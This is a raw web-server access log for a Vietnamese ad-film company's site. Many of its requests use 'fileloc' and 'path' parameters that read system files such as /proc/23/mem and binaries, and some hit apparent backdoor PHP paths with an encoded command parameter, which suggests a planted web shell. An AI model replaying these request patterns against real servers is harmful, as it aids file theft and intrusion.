34.206.212.24 - - [09/Nov/2025:00:13:21 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//usr/bin/apport-cli&path=//usr/bin HTTP/1.0" 200 6809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:13:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory3/subsystem HTTP/1.0" 200 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:13:23 +0000] "GET /q-~124C8jJYWWnTMMbwndSFhb1yEAsrBe7LS9879/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:13:24 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/mem&path=//proc/23 HTTP/1.0" 200 2820 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.219.80.71 - - [09/Nov/2025:00:13:24 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/wifi-status&path=//bin HTTP/1.0" 200 3800 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:13:25 +0000] "GET /q-~209yFclsFE6fB8QZh4pMVRNGbsmuDbuCL6608/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [09/Nov/2025:00:11:27 +0000] "GET /wp-includes/addc3d4c/edit.php?id=401440 HTTP/1.0" 200 166 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=401440" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.189 - - [09/Nov/2025:00:13:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory6/subsystem/devices/memory0 HTTP/1.0" 200 3664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:13:26 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Ftools%2Fgpio HTTP/1.0" 200 3201 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:13:26 +0000] "GET /q-~97y7Sowj7ygCg8kbrHrOAtDZWlzydlfi43234/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:13:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/mountinfo&path=//proc/23 HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:13:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/memory4/subsystem/devices/memory6 HTTP/1.0" 200 3625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:11:09 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303636362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634373036362q6566666364323461383838343433393239326132653864663164386433663962222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:00:13:31 +0000] "GET /q-~159mCrJGSZNfuuCHCc9AIWsOi2okJTgWe48372/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.84.169.196 - - [09/Nov/2025:00:13:31 +0000] "GET /our-works/tvc-relax-gaba/?fileloc=//usr/bin/bzdiff&path=//usr/bin HTTP/1.0" 200 3742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:13:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/mounts&path=//proc/23 HTTP/1.0" 200 3565 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:13:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory0 HTTP/1.0" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:13:35 +0000] "GET /q-~209yFclsFE6fB8QZh4pMVRNGbsmuDbuCL6608/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.82.38.120 - - [09/Nov/2025:00:13:35 +0000] "GET /our-works/phim-viral-ila/?fileloc=//bin/col1&path=//bin HTTP/1.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:13:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory3/power HTTP/1.0" 200 3585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:13:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/mountstats&path=//proc/23 HTTP/1.0" 404 465 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:13:37 +0000] "GET /q-~69uIvQarOAd0ngGmASYVqPxCPv2F9yks45006/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.84.250.51 - - [09/Nov/2025:00:13:38 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//var/lib/shim-signed HTTP/1.0" 200 3140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:13:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory0 HTTP/1.0" 200 3624 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:13:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/numa_maps&path=//proc/23 HTTP/1.0" 200 2824 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:13:40 +0000] "GET /q-~124C8jJYWWnTMMbwndSFhb1yEAsrBe7LS9879/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.23.137.202 - - [09/Nov/2025:00:13:42 +0000] "GET /our-works/tvc-calci/?path=//proc/fs/ext4 HTTP/1.0" 200 3134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:13:42 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory5/uevent&path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory5 HTTP/1.0" 200 2917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:13:42 +0000] "GET /q-~155RcVnxDiuDvFDQXAWb6fmLcsB2ywnQn49706/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-trackback.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:13:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/oom_adj&path=//proc/23 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:13:43 +0000] "GET /q-~97y7Sowj7ygCg8kbrHrOAtDZWlzydlfi43234/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:13:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory8/subsystem HTTP/1.0" 200 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:13:45 +0000] "GET /q-~209yFclsFE6fB8QZh4pMVRNGbsmuDbuCL6608/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:13:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/oom_score&path=//proc/23 HTTP/1.0" 200 2826 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.211.105.134 - - [09/Nov/2025:00:13:46 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/prove&path=//usr/bin HTTP/1.0" 200 8229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:00:13:48 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fpyasn1%2Fcodec HTTP/1.0" 200 3441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:13:49 +0000] "GET /q-~159mCrJGSZNfuuCHCc9AIWsOi2okJTgWe48372/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:13:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory3/subsystem/drivers HTTP/1.0" 200 2987 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:11:31 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303639312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634373039312q6362393539633734343362356135333131306162656438386333383161633962222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
79.137.67.30 - - [09/Nov/2025:00:13:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/oom_score_adj&path=//proc/23 HTTP/1.0" 200 2830 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.214.19.8 - - [09/Nov/2025:00:13:53 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//lib/systemd/systemd-timedated&path=//lib/systemd HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:13:54 +0000] "GET /q-~69uIvQarOAd0ngGmASYVqPxCPv2F9yks45006/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:13:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/memory4/subsystem/devices/memory6/subsystem HTTP/1.0" 200 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.90.73.206 - - [09/Nov/2025:00:13:55 +0000] "GET /our-works/tvc-kimiko-bo-sung-prebiotics/?path=//run/systemd/system HTTP/1.0" 200 3259 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:13:56 +0000] "GET /q-~171HuU2xYu9DGlsHRz4UkKxULyXpOgTpe4408/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:13:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/pagemap&path=//proc/23 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:13:57 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory0/subsystem HTTP/1.0" 200 3440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.144.185.255 - - [09/Nov/2025:00:13:57 +0000] "GET /our-works/tvc-jokky/?fileloc=//usr/bin/tabs&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:13:58 +0000] "GET /q-~124C8jJYWWnTMMbwndSFhb1yEAsrBe7LS9879/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:13:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory3/subsystem/devices HTTP/1.0" 200 3693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.132.10 - - [09/Nov/2025:00:13:59 +0000] "GET /q-~69e8M0iTIyzXLYHDXCsUjosOQLW6Nmvr3516/ HTTP/1.0" 200 4759 "https://lamphimquangcao.net/sitemap988.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
79.137.67.30 - - [09/Nov/2025:00:14:00 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/patch_state&path=//proc/23 HTTP/1.0" 200 2824 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:14:01 +0000] "GET /q-~234PkvCOobmYpMgH3eWBmWX1fQACZYmEs33905/ HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.71.203.206 - - [09/Nov/2025:00:14:02 +0000] "GET /our-works/tvc-kimino/?path=//lib/python3.8/xml HTTP/1.0" 200 3372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:14:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/memory4/subsystem/devices/memory4/subsystem HTTP/1.0" 200 3436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:14:04 +0000] "GET /q-~171HuU2xYu9DGlsHRz4UkKxULyXpOgTpe4408/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:14:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/personality&path=//proc/23 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:14:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory5/subsystem HTTP/1.0" 200 3436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.71.218.25 - - [09/Nov/2025:00:14:06 +0000] "GET /our-works/tvc-sjc/?fileloc=//bin/sg_read&path=//bin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:14:07 +0000] "GET /q-~157tOiFqwfoDQMohiHINYUm8w0LLCZBuz43590/ HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:14:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/projid_map&path=//proc/23 HTTP/1.0" 200 2839 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [09/Nov/2025:00:14:09 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Frtc%2Fdrv%2Fpcf8563.h&path=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Frtc%2Fdrv HTTP/1.0" 200 2895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:14:09 +0000] "GET /q-~160MuefOguELjV5wavDYacKBJmhxc1lOB28083/ HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:14:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory0/subsystem HTTP/1.0" 200 3440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:14:10 +0000] "GET / HTTP/1.0" 200 4760 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
103.82.126.243 - - [09/Nov/2025:00:14:11 +0000] "GET /wp-json/wp/v2/posts HTTP/1.0" 200 4759 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
23.23.137.202 - - [09/Nov/2025:00:14:11 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/piconv&path=//bin HTTP/1.0" 200 5898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:14:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/sched&path=//proc/23 HTTP/1.0" 200 3218 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:14:12 +0000] "GET /q-~133kd7KqraQTYJH2wanZtMRkqCkSsufLZ25852/ HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:14:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory8/subsystem/devices HTTP/1.0" 200 3693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:11:54 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303731332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634373131332q3334636565323665396330636231616537633439633132356664313434653265222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
34.224.132.215 - - [09/Nov/2025:00:14:16 +0000] "GET /our-works/tvc-lapatie-2/?path=//usr/lib/sysusers.d HTTP/1.0" 200 3254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:14:16 +0000] "GET /q-~197tl6OaQkAffsSUT1xMDcHMeRdpcykLw49234/ HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:14:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/schedstat&path=//proc/23 HTTP/1.0" 200 2828 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
100.29.164.178 - - [09/Nov/2025:00:14:18 +0000] "GET /our-works/tvc-kimiko-bo-sung-prebiotics/?path=//sys/class/tpmrm HTTP/1.0" 200 2880 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:14:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/memory4/subsystem/devices/memory6/subsystem/devices HTTP/1.0" 200 3691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:14:20 +0000] "GET /q-~234PkvCOobmYpMgH3eWBmWX1fQACZYmEs33905/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:14:21 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/sessionid&path=//proc/23 HTTP/1.0" 200 2831 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:14:22 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/memory4/subsystem/devices/memory6/subsystem/drivers HTTP/1.0" 200 2986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.172.125.172 - - [09/Nov/2025:00:14:23 +0000] "GET /our-works/intracom-riverside/?fileloc=//bin/ls&path=//bin HTTP/1.0" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:14:23 +0000] "GET /q-~234PkvCOobmYpMgH3eWBmWX1fQACZYmEs33905/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:14:25 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/setgroups&path=//proc/23 HTTP/1.0" 200 2827 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:14:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory0/subsystem/drivers HTTP/1.0" 200 2988 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
